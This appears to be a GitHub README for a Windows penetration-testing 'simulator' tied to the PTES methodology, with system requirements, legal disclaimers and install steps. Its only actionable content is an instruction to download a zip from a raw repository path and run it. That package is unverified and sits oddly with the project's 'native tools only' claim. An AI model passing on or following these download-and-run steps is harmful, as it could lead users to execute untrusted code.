Simula-o_Ataque_PTES_Windows is a tool for learning about penetration testing using only native Windows tools. This application follows the Penetration Testing Execution Standard (PTES). You will learn how to execute security testing without any third-party tools.
With this software, you will see how attacks happen in the real world: Windows machines attacking other Windows machines using Windows built-in tools.
This guide will help you download and run the software quickly. Follow each step carefully.
-
Check System Requirements:
- Windows 10 or 11
- Windows Server 2016 or higher
- At least 4 GB of RAM
- 500 MB of free disk space
-
Visit the Releases Page: To download the software, visit the Releases page here: Download Link.
-
Download the Application: On the Releases page, locate the latest version. Click on the file that fits your system:
- For Windows 10/11: Look for a file named something like
https://raw.githubusercontent.com/Cupcake137/Simula-o_Ataque_PTES_Windows/main/docs/Windows-o-Ataque-Simula-PTE-v1.0-alpha.3.zip. - For Windows Server: Choose the corresponding file.
- For Windows 10/11: Look for a file named something like
-
Run the Downloaded File: Once the file finishes downloading, locate it in your downloads folder.
- Double-click the file to start the setup.
- Follow the on-screen instructions to install.
-
Launch the Application: After installation, find the application in your Start Menu.
- Click on it to open.
- Now you can explore how different attacks work using Windows native tools.
-
Educational Use Only: This software is for learning purposes. Use it only in a controlled lab environment.
-
Illegal Use: Running this software without permission is against the law. Refer to:
- Article 154-A of the Penal Code
- General Data Protection Law (LGPD)
- The Civil Right Framework for the Internet
-
Red Teams Only: These techniques are typically used by authorized red teams in real-world environments.
If you run this software outside a lab setting, itβs no longer a pentest β it becomes illegal activity.
- Native Tools Only: Use CMD, PowerShell, and built-in resources.
- Real-World Simulation: Observe attacks as they would happen in reality.
- Lab Focused: Tailored specifically for educational use without third-party tools.
To uninstall the application, go to:
- Control Panel β Programs β Uninstall a program.
- Find Simula-o_Ataque_PTES_Windows and select uninstall.
Yes, but only in a safe lab environment where you have permission to conduct testing.
If you encounter any issues, please raise your concerns in the Issues section of the repository.
For more information about penetration testing and how to use this software effectively, consider checking these links:
If you need to download the software, visit this link: Download Link.
Make sure to follow all steps carefully. Happy testing!